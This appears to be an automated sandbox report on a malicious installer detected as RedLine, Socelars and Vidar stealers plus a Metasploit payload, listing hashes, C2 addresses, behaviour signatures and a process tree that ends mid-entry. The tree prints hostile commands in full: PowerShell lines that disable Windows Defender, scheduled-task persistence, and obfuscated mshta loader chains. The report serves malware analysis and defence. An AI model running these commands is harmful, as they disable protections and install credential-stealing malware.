Overview

overview

10

Static

static

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

3

setup_x86_...ll.exe

windows11_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

Resubmissions

18-11-2021 19:28

211118-x6xf1sach9 10

18-11-2021 14:06

211118-remjvagfd3 10

Analysis

  • max time kernel
    320s
  • max time network
    1849s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    18-11-2021 14:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    setup_x86_x64_install.exe

  • Size

    10.5MB

  • MD5

    b70883d05d292eeba3f756730a7d62bb

  • SHA1

    301bc3e6004f421ed035d9f4091ebce6fc789660

  • SHA256

    e8c56bc5bf674b494dd03d856c03c1ecfaf70e578c09f634cf66b09534f05c02

  • SHA512

    83687a8f862f2448f1b3fdbd3523248baa1a614598ba7389d79a9c8c5debdea4bef97a048481b43a1f13cea28b73ba18f5b38775772629c253454588828128e6

Score
10/10
metasploitredlinesocelarsvidarmedia18plusaspackv2backdoordiscoveryevasioninfostealerpersistencespywarestealertrojan

Malware Config

Extracted

Family

socelars

C2

http://www.gianninidesign.com/

Extracted

Family

redline

Botnet

media18plus

C2

91.121.67.60:51630

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 3 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 27 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Vidar Stealer 1 IoCs
    stealer
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Sets service image path in registry 2 TTPs
    persistence
  • Checks BIOS information in registry 2 TTPs 38 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 18 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 28 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Program Files directory 11 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 28 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Enumerates system info in registry 2 TTPs 55 IoCs
  • Kills process with taskkill 6 IoCs
    evasion
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 6 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\sihclient.exe
    C:\Windows\System32\sihclient.exe /cv 1FPS8FyOPkmM3Jgu9Ybc4Q.0.2
    1⤵
      PID:4448
    • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3600
      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3232
        • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\setup_install.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2860
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1564
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3320
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2068
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3292
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Thu13e7fdac52793516f.exe
            4⤵
              PID:1012
              • C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13e7fdac52793516f.exe
                Thu13e7fdac52793516f.exe
                5⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:1692
                • C:\Users\Admin\Pictures\Adobe Films\0kAFG6Gb0qZcLRAssa3HEQSW.exe
                  "C:\Users\Admin\Pictures\Adobe Films\0kAFG6Gb0qZcLRAssa3HEQSW.exe"
                  6⤵
                  • Executes dropped EXE
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  PID:6152
                • C:\Users\Admin\Pictures\Adobe Films\F1urGyB1VL0Ad85vTpMHfs9Q.exe
                  "C:\Users\Admin\Pictures\Adobe Films\F1urGyB1VL0Ad85vTpMHfs9Q.exe"
                  6⤵
                  • Suspicious use of NtCreateProcessExOtherParentProcess
                  • Executes dropped EXE
                  PID:5408
                • C:\Users\Admin\Pictures\Adobe Films\hkrn8zol2NQwEcEiGW9lzkvQ.exe
                  "C:\Users\Admin\Pictures\Adobe Films\hkrn8zol2NQwEcEiGW9lzkvQ.exe"
                  6⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  PID:5804
                  • C:\Users\Admin\Documents\vD4jlVp3UdWH6EHhvBtubC0C.exe
                    "C:\Users\Admin\Documents\vD4jlVp3UdWH6EHhvBtubC0C.exe"
                    7⤵
                      PID:4016
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                      7⤵
                      • Creates scheduled task(s)
                      PID:7016
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                      7⤵
                      • Executes dropped EXE
                      • Creates scheduled task(s)
                      PID:6244
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        8⤵
                          PID:5588
                    • C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe
                      "C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"
                      6⤵
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious use of SetThreadContext
                      PID:4696
                      • C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe
                        "C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"
                        7⤵
                          PID:4492
                        • C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe
                          "C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"
                          7⤵
                            PID:5084
                          • C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe
                            "C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"
                            7⤵
                              PID:2176
                              • C:\Users\Admin\AppData\Local\Temp\fl.exe
                                "C:\Users\Admin\AppData\Local\Temp\fl.exe"
                                8⤵
                                  PID:2340
                                  • C:\Users\Admin\AppData\Local\Temp\winlogson.exe
                                    "C:\Users\Admin\AppData\Local\Temp\winlogson.exe"
                                    9⤵
                                      PID:2232
                              • C:\Users\Admin\Pictures\Adobe Films\EZetOP9i3zgHCVJL2BPdwiFu.exe
                                "C:\Users\Admin\Pictures\Adobe Films\EZetOP9i3zgHCVJL2BPdwiFu.exe"
                                6⤵
                                • Drops file in Program Files directory
                                PID:4848
                                • C:\Program Files (x86)\Company\NewProduct\cm3.exe
                                  "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
                                  7⤵
                                    PID:6472
                                  • C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
                                    "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
                                    7⤵
                                    • Checks whether UAC is enabled
                                    PID:3808
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 1824
                                      8⤵
                                      • Program crash
                                      PID:4692
                                  • C:\Program Files (x86)\Company\NewProduct\inst2.exe
                                    "C:\Program Files (x86)\Company\NewProduct\inst2.exe"
                                    7⤵
                                      PID:1164
                                  • C:\Users\Admin\Pictures\Adobe Films\ZbU91MVagd34sdG4Rbt_5065.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\ZbU91MVagd34sdG4Rbt_5065.exe"
                                    6⤵
                                    • Checks BIOS information in registry
                                    • Checks whether UAC is enabled
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:5740
                                  • C:\Users\Admin\Pictures\Adobe Films\p23DUeCJT8KlEQ6CGhlNw6C7.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\p23DUeCJT8KlEQ6CGhlNw6C7.exe"
                                    6⤵
                                    • Checks BIOS information in registry
                                    • Checks whether UAC is enabled
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:3524
                                  • C:\Users\Admin\Pictures\Adobe Films\dg1VTPLek6Cdu2W3YLkBGjIW.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\dg1VTPLek6Cdu2W3YLkBGjIW.exe"
                                    6⤵
                                      PID:6612
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6612 -s 296
                                        7⤵
                                        • Program crash
                                        • Checks processor information in registry
                                        • Enumerates system info in registry
                                        PID:5984
                                    • C:\Users\Admin\Pictures\Adobe Films\_qpBu0zIOrE_TG7iNbTAc9hh.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\_qpBu0zIOrE_TG7iNbTAc9hh.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5928
                                    • C:\Users\Admin\Pictures\Adobe Films\fRnyy_CSOjl8akfKb_oG3Szx.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\fRnyy_CSOjl8akfKb_oG3Szx.exe"
                                      6⤵
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:2344
                                    • C:\Users\Admin\Pictures\Adobe Films\E8DiPYyBvHk2yBAI40qJ_ufz.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\E8DiPYyBvHk2yBAI40qJ_ufz.exe"
                                      6⤵
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of SetThreadContext
                                      PID:2184
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                        7⤵
                                          PID:7036
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 564
                                          7⤵
                                          • Program crash
                                          • Checks processor information in registry
                                          • Enumerates system info in registry
                                          PID:3104
                                      • C:\Users\Admin\Pictures\Adobe Films\yqeRwMlYr7iIiWzJP7pXteqQ.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\yqeRwMlYr7iIiWzJP7pXteqQ.exe"
                                        6⤵
                                          PID:7104
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7104 -s 288
                                            7⤵
                                            • Program crash
                                            • Checks processor information in registry
                                            • Enumerates system info in registry
                                            PID:1788
                                        • C:\Users\Admin\Pictures\Adobe Films\pDSfpWvMOdXLnHF5CBPs8ddZ.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\pDSfpWvMOdXLnHF5CBPs8ddZ.exe"
                                          6⤵
                                            PID:1264
                                          • C:\Users\Admin\Pictures\Adobe Films\RiqdOtex9K5R7lgsfgaIEEDx.exe
                                            "C:\Users\Admin\Pictures\Adobe Films\RiqdOtex9K5R7lgsfgaIEEDx.exe"
                                            6⤵
                                              PID:416
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 292
                                                7⤵
                                                • Program crash
                                                • Checks processor information in registry
                                                • Enumerates system info in registry
                                                PID:5768
                                            • C:\Users\Admin\Pictures\Adobe Films\tYdyN5ueoppYS4GrWPmDQ0Dj.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\tYdyN5ueoppYS4GrWPmDQ0Dj.exe"
                                              6⤵
                                                PID:6268
                                                • C:\Users\Admin\AppData\Roaming\4532497.exe
                                                  "C:\Users\Admin\AppData\Roaming\4532497.exe"
                                                  7⤵
                                                    PID:5028
                                                  • C:\Users\Admin\AppData\Roaming\4072032.exe
                                                    "C:\Users\Admin\AppData\Roaming\4072032.exe"
                                                    7⤵
                                                    • Suspicious behavior: SetClipboardViewer
                                                    PID:5560
                                                  • C:\Users\Admin\AppData\Roaming\8062743.exe
                                                    "C:\Users\Admin\AppData\Roaming\8062743.exe"
                                                    7⤵
                                                    • Checks BIOS information in registry
                                                    • Checks whether UAC is enabled
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:1892
                                                  • C:\Users\Admin\AppData\Roaming\8602699.exe
                                                    "C:\Users\Admin\AppData\Roaming\8602699.exe"
                                                    7⤵
                                                    • Checks BIOS information in registry
                                                    • Checks whether UAC is enabled
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:4312
                                                  • C:\Users\Admin\AppData\Roaming\3250216.exe
                                                    "C:\Users\Admin\AppData\Roaming\3250216.exe"
                                                    7⤵
                                                    • Checks BIOS information in registry
                                                    • Checks whether UAC is enabled
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:4660
                                                  • C:\Users\Admin\AppData\Roaming\8171918.exe
                                                    "C:\Users\Admin\AppData\Roaming\8171918.exe"
                                                    7⤵
                                                      PID:3716
                                                      • C:\Users\Admin\AppData\Roaming\6567327.exe
                                                        "C:\Users\Admin\AppData\Roaming\6567327.exe"
                                                        8⤵
                                                          PID:7060
                                                          • C:\Windows\SysWOW64\mshta.exe
                                                            "C:\Windows\System32\mshta.exe" vbscRiPT: ClOSe ( CREAteOBJeCT ( "wScript.SHELl" ). ruN ( "cMD.Exe /q /R cOPY /y ""C:\Users\Admin\AppData\Roaming\6567327.exe"" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If """" == """" for %P in ( ""C:\Users\Admin\AppData\Roaming\6567327.exe"") do taskkill -F /IM ""%~nxP"" " , 0 , trUE) )
                                                            9⤵
                                                              PID:5636
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /q /R cOPY /y "C:\Users\Admin\AppData\Roaming\6567327.exe" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If "" == "" for %P in ( "C:\Users\Admin\AppData\Roaming\6567327.exe") do taskkill -F /IM "%~nxP"
                                                                10⤵
                                                                  PID:5644
                                                                  • C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe
                                                                    ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X
                                                                    11⤵
                                                                      PID:4240
                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                        "C:\Windows\System32\mshta.exe" vbscRiPT: ClOSe ( CREAteOBJeCT ( "wScript.SHELl" ). ruN ( "cMD.Exe /q /R cOPY /y ""C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe"" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If ""-p1MldDG_NCbaD4X "" == """" for %P in ( ""C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe"") do taskkill -F /IM ""%~nxP"" " , 0 , trUE) )
                                                                        12⤵
                                                                          PID:4804
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /q /R cOPY /y "C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If "-p1MldDG_NCbaD4X " == "" for %P in ( "C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe") do taskkill -F /IM "%~nxP"
                                                                            13⤵
                                                                              PID:4700
                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                            "C:\Windows\System32\mshta.exe" VbScRipt: cLosE ( creATEoBJEct ( "wscRIPT.SHEll" ). RuN ( "CMD.EXE /C ecHo | sET /P = ""MZ"" > mVDFV.Y & cOPY /B /Y MvDFV.y + ET4TqB.Z_p + YnUsc8.EO ..\FF7K4.SIO & DEl /Q *& stARt msiexec.exe -Y ..\Ff7k4.sIo " , 0 , TRUE ) )
                                                                            12⤵
                                                                              PID:7144
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C ecHo | sET /P = "MZ" > mVDFV.Y & cOPY /B /Y MvDFV.y+ ET4TqB.Z_p + YnUsc8.EO ..\FF7K4.SIO & DEl /Q *& stARt msiexec.exe -Y ..\Ff7k4.sIo
                                                                                13⤵
                                                                                  PID:6568
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>mVDFV.Y"
                                                                                    14⤵
                                                                                      PID:6988
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" ecHo "
                                                                                      14⤵
                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                      PID:5424
                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                      msiexec.exe -Y ..\Ff7k4.sIo
                                                                                      14⤵
                                                                                        PID:5520
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill -F /IM "6567327.exe"
                                                                                  11⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:2992
                                                                          • C:\Users\Admin\AppData\Roaming\598006.exe
                                                                            "C:\Users\Admin\AppData\Roaming\598006.exe"
                                                                            8⤵
                                                                              PID:5860
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 288
                                                                                9⤵
                                                                                • Program crash
                                                                                • Checks processor information in registry
                                                                                • Enumerates system info in registry
                                                                                PID:2208
                                                                          • C:\Users\Admin\AppData\Roaming\6044388.exe
                                                                            "C:\Users\Admin\AppData\Roaming\6044388.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Checks processor information in registry
                                                                            • Enumerates system info in registry
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:1704
                                                                        • C:\Users\Admin\Pictures\Adobe Films\BNNSqUTSmvqfjeBCDyu9kFjB.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\BNNSqUTSmvqfjeBCDyu9kFjB.exe"
                                                                          6⤵
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:5856
                                                                          • C:\Users\Admin\Pictures\Adobe Films\BNNSqUTSmvqfjeBCDyu9kFjB.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\BNNSqUTSmvqfjeBCDyu9kFjB.exe"
                                                                            7⤵
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:6000
                                                                        • C:\Users\Admin\Pictures\Adobe Films\mOCdpbqgrcbt7VF4ohjxHQVQ.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\mOCdpbqgrcbt7VF4ohjxHQVQ.exe"
                                                                          6⤵
                                                                            PID:2104
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 292
                                                                              7⤵
                                                                              • Program crash
                                                                              • Checks processor information in registry
                                                                              • Enumerates system info in registry
                                                                              PID:1992
                                                                          • C:\Users\Admin\Pictures\Adobe Films\WXvYcKCIlYSmzJ6lXgOg7s8q.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\WXvYcKCIlYSmzJ6lXgOg7s8q.exe"
                                                                            6⤵
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:5208
                                                                            • C:\Users\Admin\Pictures\Adobe Films\WXvYcKCIlYSmzJ6lXgOg7s8q.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\WXvYcKCIlYSmzJ6lXgOg7s8q.exe"
                                                                              7⤵
                                                                                PID:5968
                                                                            • C:\Users\Admin\Pictures\Adobe Films\tY4aYIHt9E5KpidGaW_SQVpC.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\tY4aYIHt9E5KpidGaW_SQVpC.exe"
                                                                              6⤵
                                                                                PID:5896
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 296
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  • Checks processor information in registry
                                                                                  • Enumerates system info in registry
                                                                                  PID:6504
                                                                              • C:\Users\Admin\Pictures\Adobe Films\OXlf_8JgmneEN4KvS6QqMNuO.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\OXlf_8JgmneEN4KvS6QqMNuO.exe"
                                                                                6⤵
                                                                                  PID:1244
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:6720
                                                                                    • C:\Users\Admin\AppData\Local\Temp\neiner.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\neiner.exe"
                                                                                      8⤵
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks whether UAC is enabled
                                                                                      PID:1488
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 540
                                                                                        9⤵
                                                                                        • Program crash
                                                                                        • Checks processor information in registry
                                                                                        • Enumerates system info in registry
                                                                                        PID:2520
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 552
                                                                                        9⤵
                                                                                        • Program crash
                                                                                        • Checks processor information in registry
                                                                                        • Enumerates system info in registry
                                                                                        PID:4576
                                                                                    • C:\Users\Admin\AppData\Local\Temp\clepper.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\clepper.exe"
                                                                                      8⤵
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks whether UAC is enabled
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:6580
                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                        9⤵
                                                                                          PID:5892
                                                                                          • C:\Users\Admin\AppData\Roaming\Intel Rapid\IntelRapid.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\Intel Rapid\IntelRapid.exe"
                                                                                            10⤵
                                                                                              PID:7012
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 572
                                                                                            9⤵
                                                                                            • Program crash
                                                                                            PID:6252
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 556
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        • Checks processor information in registry
                                                                                        • Enumerates system info in registry
                                                                                        PID:4596
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\4lvGstGayynqkqb874rBO526.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\4lvGstGayynqkqb874rBO526.exe"
                                                                                      6⤵
                                                                                        PID:3692
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 1732
                                                                                          7⤵
                                                                                          • Program crash
                                                                                          PID:4332
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\briKVPtFav5srEMmUPR7iz7u.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\briKVPtFav5srEMmUPR7iz7u.exe"
                                                                                        6⤵
                                                                                          PID:6456
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-I3SG1.tmp\briKVPtFav5srEMmUPR7iz7u.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-I3SG1.tmp\briKVPtFav5srEMmUPR7iz7u.tmp" /SL5="$601F6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\briKVPtFav5srEMmUPR7iz7u.exe"
                                                                                            7⤵
                                                                                            • Loads dropped DLL
                                                                                            PID:6556
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-DP7V9.tmp\lakazet.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-DP7V9.tmp\lakazet.exe" /S /UID=2709
                                                                                              8⤵
                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                              • Drops file in Drivers directory
                                                                                              • Adds Run key to start application
                                                                                              • Drops file in Program Files directory
                                                                                              PID:1328
                                                                                              • C:\Users\Admin\AppData\Local\Temp\af-bacd3-f4b-47b83-40850e39cdbf2\Rakiqosuvy.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\af-bacd3-f4b-47b83-40850e39cdbf2\Rakiqosuvy.exe"
                                                                                                9⤵
                                                                                                  PID:6236
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                    10⤵
                                                                                                    • Enumerates system info in registry
                                                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    PID:7100
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
